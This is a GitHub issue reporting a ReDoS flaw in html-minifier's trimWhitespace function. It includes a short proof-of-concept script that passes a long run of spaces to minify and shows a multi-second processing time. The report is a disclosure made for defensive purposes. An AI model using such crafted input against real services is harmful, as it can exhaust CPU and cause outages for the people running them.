html-minifier icon indicating copy to clipboard operation
html-minifier copied to clipboard
verified publisher icon kangax

[Security] ReDoS Vulnerability

Open ready-research opened this issue 3 years ago • 0 comments

Hi team, I have reported a security issue in huntr 9 months back, but I didn't get any response https://www.huntr.dev/bounties/e98b8228-41bc-4304-afd6-256c6dfebf9e/ Please validate this issue using Mark as Valid. Thanks.

✍️ Description A ReDoS (regular expression denial of service) flaw was found in the html-minifier. An attacker that is able to provide crafted input to the trimWhitespace function may cause an application to consume an excessive amount of CPU. https://github.com/kangax/html-minifier/blob/e15a892cd2f578aa281e766924fdd6f17f80f607/src/htmlminifier.js#L12

Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept Create the following poc.js

// PoC.js
var htmlMinifier = require("html-minifier")
function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}

var time = Date.now();
htmlMinifier.minify(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost);

Execute the following command in another terminal:

npm i html-minifier
node poc.js

Check the Output:

time_cost: 3794

Ideally, the time cost should be 1-10 milliseconds.

💥 Impact This vulnerability is capable of exhausting system resources and leading to crashes.

ready-research avatar May 10 '22 11:05 ready-research